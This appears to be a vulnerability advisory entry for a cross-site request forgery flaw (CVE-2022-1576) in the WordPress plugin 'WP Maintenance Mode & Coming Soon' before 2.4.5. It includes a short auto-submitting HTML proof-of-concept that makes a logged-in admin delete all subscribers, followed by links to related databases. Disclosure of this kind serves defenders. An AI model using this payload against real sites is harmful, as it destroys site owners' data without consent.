Lucene search
Daniel RufWPEX-ID:68DEAB46-1C16-46AE-A912-A104958CA4CFHistoryJun 20, 2022 - 12:00 a.m.
WP Maintenance Mode & Coming Soon < 2.4.5 - Subscribed Users Deletion via CSRF
2022-06-2000:00:00
Daniel Ruf
111
0.001 Low
EPSS
Percentile
26.3%
The plugin is lacking CSRF when emptying the subscribed users list, which could allow attackers to make a logged in admin perform such action via a CSRF attack
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="wpmm_subscribers_empty_list">
</form>
<script>
document.getElementById("test").submit();
</script>Related
cnvd
cnvd
WordPress Maintenance Mode
2022-07-13 00:00:00
patchstack
patchstack
wpvulndb
wpvulndb
cve
cve
CVE-2022-1576
2022-07-11 13:15:08
cvelist
cvelist
openvas
openvas
WordPress Maintenance Mode Plugin < 2.4.5 CSRF Vulnerability
2022-07-12 00:00:00
nvd
nvd
CVE-2022-1576
2022-07-11 13:15:08
prion
prion
Cross site request forgery (csrf)
2022-07-11 13:15:00